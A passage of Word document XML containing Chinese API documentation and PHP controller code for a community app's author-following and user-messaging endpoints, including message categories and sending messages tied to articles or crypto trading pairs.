          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465CD1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用户关注动态作者成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EE0E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{Integer} follow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已关注；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已取消关注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AB1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用户关注动态作者失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42125B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5558C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EB1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follow_author()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F509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6E8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AEF1F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528699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0A965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DAAB5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请先登录账号，然后关注用户社区动态作者</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291168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1BE809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C1A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3D1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$article_id = input('param.article_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F347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($article_id == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1518F9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A34D5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用户社区动态</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57FE5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5316B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B67F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6354D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Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E057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$article_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8300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0EAE06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(!empty($article)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454A6E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$data['gz_uid'] = $article['member_id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5383E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$member_guanzhu = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075282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03583E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B62A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(!empty($member_guanzhu)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436DBE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Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642157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6E14CB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-&gt;delete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC97E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】已取消关注您</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030BBE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$article['member_id'], $content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AA6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8C520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用户取消关注动态作者成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D881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0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F172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D2FA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CEFBB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040BD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$member_guanzhu_id = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564A17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73637C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($member_guanzhu_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB5D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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户【</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . $this-&gt;member['username'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>】已关注您</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E103A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notify($this-&gt;memberId, $article['member_id'], $content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA89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1D57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用户关注动态作者成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0690CE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1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C412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4D24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8586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282BB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C571E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5337B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该用户社区动态不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631C32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4BC386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1A0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BF61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15E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3A534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用户关注动态作者失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CABB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338AE3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380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221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CCAF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/api/circle/followed_authors </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户关注的动态作者列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8824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当前用户关注的动态作者列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E36C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用户社区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC99F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4F1C4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2A1366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动态作者列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45465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author.username      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F787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author.img           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51049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author.follow_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者关注数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373D9A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author.article_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者发表文章数目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5163E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用户关注动态作者失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDB22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14CB95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2156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followed_authors()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570083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C97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227C6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5AFC29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6CBB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18F03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069655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05103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0295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307E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$followed_authors = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7279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3EADE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30EDF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(count($followed_authors) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33771A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($followed_authors as $key =&gt; $followed_author) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B451A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$author = _user($followed_author['gz_uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252510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(!empty($author)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A00FF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$followed_authors[$key]['author'] = $author;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33604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$followed_authors[$key]['author']['img'] = $author['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106B7B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$followed_authors[$key]['author']['follow_num'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065D27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$followed_author['gz_uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC7CB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1E6F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$followed_authors[$key]['author']['article_num'] = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EFC7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$followed_author['gz_uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB88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5266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$followed_authors[$key]['author']['article_num'] += Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E403C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$followed_author['gz_uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414E54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50FDF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01DA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154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7B20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json($followed_authors);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A90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FDBB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7172F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5F76C7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6AC49F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14215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5DD50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Message extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F97B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A8FF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50831A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50A4D3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4505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18E3E4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B30D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6524F5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F461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1B4D3F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86D6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38DF8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03C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74133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1FF13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041F9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_decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A27BC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71646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34E53D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598290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00DD94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4F9D62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63DF58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0A598A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2832F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55362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2AFAF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792C78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1425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F2FC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1D83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701654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23BC5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AFB29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06677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5601CF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1E8F73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4DD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9536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86B32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137374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4F54B5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7FB4EE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B3A23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606E47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01CCB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EDB8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CA23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DCBF1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FF4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3F3C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B4E4C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55E233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61EE8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FC3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9DE4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75413A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6D50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A42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0085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053D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/api/message/create_type </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建消息分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021DA8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创建消息分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DB6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用户消息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB8EC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35A3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477C3C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title       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>消息分类名称（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041F27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description </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>消息分类备注（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A45EB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消息分类创建成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276EA1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消息分类创建失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A39E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7A50D6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4E2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create_type()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7290B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5334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71BD0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10805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请先登录账号，然后创建消息分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCC42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60F14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8379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DE1C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input('param.title', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D09CC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($data['title'] == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF461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9435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消息分类名称不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F595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7E3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028D6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$message_type = Db::name('message_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058BC8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-&gt;where('title', $data['title'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8C5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493D15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(!empty($message_type)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476F63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73BFF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同名消息分类已存在，请更换消息分类名称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C78E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A079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54F2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input('param.description', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F4C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time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3670C0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$message_type_id = Db::name('message_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA11B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25B5D6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($message_type_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFC87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1DA93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消息分类创建成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296314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1FE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1761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40E8A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消息分类创建失败，请稍后重试</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF271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0158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9E3A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2DDB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/api/message/types </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取消息分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013C63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获取消息分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B17A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用户消息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B3E1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AD723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message_types  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7B5A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用户消息分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194C08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title        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息分类标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F44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description  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息分类备注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A335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message_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E743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0F9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types()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE358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CCB6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$message_types = Db::name('message_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507080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06FA3F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(count($message_types) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4958E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($message_types as $key =&gt; $message_type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EA61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$message_types[$key]['message_num'] = Db::name('message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249BA4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-&gt;where('type_id', $message_type['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FE86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C6915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5E8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6C8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json($message_types);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CBB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2008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F67D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/api/message/send </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发送消息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614889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发送消息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CB9A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用户消息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C03F2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E81E2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7ECE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type_id   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>消息分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F9C3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member_id </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>消息接收者</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D84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article_id        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52274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circle_id         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482376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circle_article_id </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1380C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coin_id           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E967E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交易所（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7275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symbol            </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0816BA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消息内容（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFF04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link      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相关链接（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544CDC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用户消息发送成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C2FE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用户消息发送失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA88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7EC2D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CC2C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send()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CA63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4C6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12895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$data['sender_id'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFCBA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6796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A5FF8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请先登录账号，然后发送消息</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBBF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3C6C95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A6CB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C7E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$data['type_id'] = input('param.type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AB98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($data['type_id'] == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1328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F834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消息分类</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1912B9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5771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B89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$data['recipient_id'] = input('param.member_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D943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($data['recipient_id'] == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF55B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8BC27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消息接收者</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4552E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B09F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E4AE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$data['article_id'] = input('param.article_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421671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$data['circle_id'] = input('param.circle_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720DA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$data['circle_article_id'] = input('param.circle_article_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1084A4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$data['coin_id'] = input('param.coin_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B984D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$data['exchange'] = input('param.exchange', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDFB3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$data['symbol'] = input('param.symbol', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CED9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input('param.content', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612274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($data['content'] == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D10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0048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用户消息内容不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F8EE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DBF0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A231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$data['link'] = input('param.link', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264E06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$data['read'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A62C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$data['create_time'] = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9AB7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$message_id = Db::name('message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597C10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079A0B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($message_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC4AB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F6B4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用户消息发送成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D79D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65BD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365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0B538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用户消息发送失败，请稍后重试</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
